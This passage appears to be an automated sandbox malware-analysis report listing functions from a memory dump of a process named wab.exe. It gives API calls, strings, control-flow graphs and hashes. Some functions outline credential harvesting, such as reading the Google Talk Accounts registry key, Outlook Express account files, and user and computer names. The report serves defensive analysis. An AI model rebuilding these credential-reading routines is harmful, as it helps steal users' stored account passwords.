                                                control_flow_graph 374 40ccd7-40cd06 ??2@YAPAXI@Z 375 40cd08-40cd0d 374->375 376 40cd0f 374->376 377 40cd11-40cd24 ??2@YAPAXI@Z 375->377 376->377 378 40cd26-40cd2d call 404025 377->378 379 40cd2f 377->379 380 40cd31-40cd57 378->380 379->380 382 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 380->382 383 40cd59-40cd60 DeleteObject 380->383 383->382
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                • String ID:
                                                • API String ID: 2054149589-0
                                                • Opcode ID: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                                • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                • Opcode Fuzzy Hash: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                                • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004085D2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79registryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                  • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                  • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                  • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                  • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                  • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                  • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                • memset.MSVCRT ref: 00408620
                                                  • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                • memset.MSVCRT ref: 00408671
                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                                • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                                Strings
                                                • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                                • String ID: Software\Google\Google Talk\Accounts
                                                • API String ID: 1366857005-1079885057
                                                • Opcode ID: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                • Opcode Fuzzy Hash: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040BA28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 414 40ba28-40ba3a 415 40ba87-40ba9b call 406c62 414->415 416 40ba3c-40ba52 call 407e20 _mbsicmp 414->416 438 40ba9d call 4107f1 415->438 439 40ba9d call 404734 415->439 440 40ba9d call 404785 415->440 441 40ba9d call 403c16 415->441 442 40ba9d call 410a9c 415->442 421 40ba54-40ba6d call 407e20 416->421 422 40ba7b-40ba85 416->422 428 40ba74 421->428 429 40ba6f-40ba72 421->429 422->415 422->416 423 40baa0-40bab3 call 407e30 430 40bab5-40bac1 423->430 431 40bafa-40bb09 SetCursor 423->431 432 40ba75-40ba76 call 40b5e5 428->432 429->432 433 40bac3-40bace 430->433 434 40bad8-40baf7 qsort 430->434 432->422 433->434 434->431 438->423 439->423 440->423 441->423 442->423
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Cursor_mbsicmpqsort
                                                • String ID: /nosort$/sort
                                                • API String ID: 882979914-1578091866
                                                • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00410DBB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                                                  • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                • memset.MSVCRT ref: 00410E10
                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                • _mbscpy.MSVCRT ref: 00410E87
                                                  • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                Strings
                                                • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                • API String ID: 889583718-2036018995
                                                • Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                • Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00410C68 Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                Download Yara Rule
                                                APIs
                                                • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Resource$FindLoadLockSizeof
                                                • String ID:
                                                • API String ID: 3473537107-0
                                                • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                                • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004109CF Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 004109F7
                                                  • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                  • Part of subcall function 004075CD: memcpy.MSVCRT ref: 00407618
                                                • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                • memset.MSVCRT ref: 00410A32
                                                • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                • String ID:
                                                • API String ID: 3143880245-0
                                                • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00408D34 Relevance: 5.0, APIs: 4, Instructions: 36COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??2@
                                                • String ID:
                                                • API String ID: 1033339047-0
                                                • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                                • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00406F30 Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??3@mallocmemcpy
                                                • String ID:
                                                • API String ID: 3831604043-0
                                                • Opcode ID: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                                                • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                                                • Opcode Fuzzy Hash: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                                                • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00407088 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                  • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                                                • CreateFontIndirectA.GDI32(?), ref: 004070A6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: CreateFontIndirect_mbscpymemset
                                                • String ID: Arial
                                                • API String ID: 3853255127-493054409
                                                • Opcode ID: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                                                • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                                                • Opcode Fuzzy Hash: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                                                • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0044B3CF Relevance: 3.1, APIs: 2, Instructions: 100COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                                                • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040CE70 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                • _strcmpi.MSVCRT ref: 0040CEC3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: strlen$_strcmpimemset
                                                • String ID: /stext
                                                • API String ID: 520177685-3817206916
                                                • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0044B40E Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                                                • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0044B42B Relevance: 3.1, APIs: 2, Instructions: 54memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                                                • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00404734 Relevance: 3.0, APIs: 2, Instructions: 24libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Library$AddressFreeLoadProc
                                                • String ID:
                                                • API String ID: 145871493-0
                                                • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00410A6B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                  • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                  • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                  • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: PrivateProfile$StringWrite_itoamemset
                                                • String ID:
                                                • API String ID: 4165544737-0
                                                • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00404785 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                Download Yara Rule
                                                APIs
                                                • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: FreeLibrary
                                                • String ID:
                                                • API String ID: 3664257935-0
                                                • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00406D1A Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004107F1 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                Download Yara Rule
                                                APIs
                                                • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: FreeLibrary
                                                • String ID:
                                                • API String ID: 3664257935-0
                                                • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00410CF3 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                Download Yara Rule
                                                APIs
                                                • EnumResourceNamesA.KERNEL32(?,?,Function_00010C68,00000000), ref: 00410D02
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: EnumNamesResource
                                                • String ID:
                                                • API String ID: 3334572018-0
                                                • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                                                • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00407F90 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                Download Yara Rule
                                                APIs
                                                • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: CloseFind
                                                • String ID:
                                                • API String ID: 1863332320-0
                                                • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00410A9C Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Open
                                                • String ID:
                                                • API String ID: 71445658-0
                                                • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                                                • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00406F81 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 00401060 Relevance: 39.2, APIs: 26, Instructions: 186COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                • LoadCursorA.USER32(00000067), ref: 0040115F
                                                • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                • EndDialog.USER32(?,00000001), ref: 0040121A
